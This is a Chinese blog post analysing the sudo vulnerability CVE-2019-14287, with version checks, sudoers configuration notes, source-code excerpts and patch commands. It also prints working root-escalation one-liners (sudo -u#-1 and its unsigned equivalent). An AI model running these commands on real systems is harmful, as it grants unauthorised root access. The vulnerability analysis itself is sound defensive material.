"/>
·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
DZ插件网 门户 网站安全 查看内容

LinuxSudo漏洞(CVE-2019-14287)分析

2022-5-1 01:06| 发布者: admin| 查看: 280| 评论: 0|原作者: 白帽子

摘要: No.1漏洞介绍最近的国外的团队跟踪并披露了该漏洞,报告中发现,在所有sudo版本低于1.8.29的Linux机器,均受到该漏洞的影响....

No.1

漏洞介绍

    最近的国外的团队跟踪并披露了该漏洞,报告中发现,在所有sudo版本低于1.8.29 的Linux机器,均受到该漏洞的影响。

    此漏洞可以使用户拥有权限运行其他用户命令。


No.2

漏洞细节

    sudo允许非特权用户以root用户身份执行命令,问题在于在sudo id 在1.8.28之前的版本中以任意用户实现了运行命令的方式,虽然攻击的利用方式,需要对本地配置进行修改,利用此漏洞需要恶意用户具有以任何用户(root用户除外)身份运行命令的特权,如果sudoers文件ALL中Runas参数带有特殊值,则可以利用成功。

    在你的Linux机器上运行一下命令。

sudo -V | grep 'Sudo version'

即可查看是否受到该版本(低于1.8.29)的影响。


No.3

漏洞分析

sudo程序本身是一个设置的SUID位的二进制文件。我们可以检查一下他的权限:

ls -l /usr/bin/sudo

    它的所有者是root,所以每个用户都已像root那样执行该程序。设置了SUID的程序在运行时可以给使用者以所有者的EUID

    sudo的配置都记录在/etc/sudoers文件中,配置文件知名哪些用户可以执行哪些命令。要使用sudo,用户只须提供sudo用户的密码。

    那么本次漏洞的命令就是

sudo -uusername#uidUSer

    因为需要用户执行此命令,那么需要用户的sudoers中的runas说明具有特殊值ALL

    查看一下/etc/sudoers

配置文件分析

%开头,代表”将要授权组“,例如其中的%admin、%sudo。

%不开头的,代表”将要授权的用户“,例如其中的root。

root ALL=(ALL:ALL) ALL

第一个ALL的意思是root用户在那些服务器上登录本服务器来执行sudo命令。

第二个和第三个ALL则表示可以切换到任何(用户:组)。

第四个为ALL,则表示可以执行任意命令。

例如图中,已经添加了

testuser ALL=(ALL:ALL) ALL

修改后那么在恶意用户下,则可以运行一下命令将自己升级为root

sudo -u#-1 id -u

或者

sudo -u#4294967295 id -u

    在32位或者64位机,C语言中整数存储占用4个字节,一个字节8位,共计32位

    整数在计算机中以补码形式存储,-1的补码为32个1组成的二进制数,按无符号数输出这个二进制数

    就是2^32-1=4294967295

    由于采用补码表示整数,计算机本身不关心整数是正数还是负数,统一按无符号数对待。具体输出时,显示为什么数,计算机按编程者的格式要求进行处理输出。如32个1组成的二进制数,按%d输出就是-1,按无符号输出就是 4294967295。

    这也就是在-1和4294967295的时候 sudo 对其ID值无效,实际上他们返回的值为0

通过分析sudo的源码分析

void

exec_cmnd(struct command_details *details, struct command_status *cstat,

    int errfd)

{

    debug_decl(exec_cmnd, SUDO_DEBUG_EXEC)


    restore_signals();

    if (exec_setup(details, NULL, -1) == true) {

        /* headed for execve() */

        sudo_debug_execve(SUDO_DEBUG_INFO, details->command,

                          details->argv, details->envp);

        sudo_execve(details->command, details->argv, details->envp,

                    ISSET(details->flags, CD_NOEXEC));

        cstat->type = CMD_ERRNO;

        cstat->val = errno;

        sudo_debug_printf(SUDO_DEBUG_ERROR, "unable to exec %s: %s",

                          details->command, strerror(errno));

    }

    debug_return;

}

其中exec_setup,SUD0_DEBUG_EXEC,可以执行组ID,及创建掩码

bool

exec_setup(struct command_details *details, const char *ptyname, int ptyfd)

{

    bool rval = false;

    debug_decl(exec_setup, SUDO_DEBUG_EXEC);

    unlimit_nproc();


#ifdef HAVE_SETRESUID

    if (setresuid(details->uid, details->euid, details->euid) != 0) {

    sudo_warn(U_("unable to change to runas uid (%u, %u)"), details->uid,

        details->euid);

    goto done;

    }

#elif defined(HAVE_SETREUID)

    if (setreuid(details->uid, details->euid) != 0) {

    sudo_warn(U_("unable to change to runas uid (%u, %u)"),

        (unsigned int)details->uid, (unsigned int)details->euid);

    goto done;

    }

#else

    if (seteuid(details->euid) != 0 || setuid(details->euid) != 0) {

    sudo_warn(U_("unable to change to runas uid (%u, %u)"), details->uid,

        details->euid);

    goto done;

    }

#endif /* !HAVE_SETRESUID && !HAVE_SETREUID */


    /* Restore previous value of RLIMIT_NPROC. */

    restore_nproc();


    rval = true;


done:

    debug_return_bool(rval);

}

通过源码分析

其中有三个函数可以设置用户权限

setresuid

setreuid

seteuid

    其中的函数在root权限时参数可以改变为任何ID,

    sudo程序最初会调用了setuid(root_uid)使程序的进程获得的root权限,通过前面的ls -l /usr/bin/sudo已经检验过了

    所以这三个函数都能修改进程的用户所获得的权限。因为默认情况下sudo会将权限提升为root

    在出现整数溢出的时候,-1或者4294967295则被判断为0返回为真,则使得权限升级为root。

    调用setuid将我们的恶意用户设置为root,从而执行任意命令。


No.4

漏洞修复

Debian:

sudo apt-get update & apt-get upgrade sudo apt-get upgrade sudo

RHEL:

yum update

yum update sudo

最后通过检查sudo的版本号是否大于等于1.8.29

sudo -V | grep 'Sudo version'

专注渗透测试技术

全球最新网络攻击技术


END




上一篇:【实战分享】记一次对某医院HIS系统的渗透测试
下一篇:APP抓包——Xposed+JustTrustMe关闭SSL证书验证

鲜花

握手

雷人

路过

鸡蛋

评论

您需要登录后才可以发表言论 登录立即注册
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.147.82.252,GMT+8, 2024-11-24 01:02 , Processed in 0.171354 second(s), 49 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部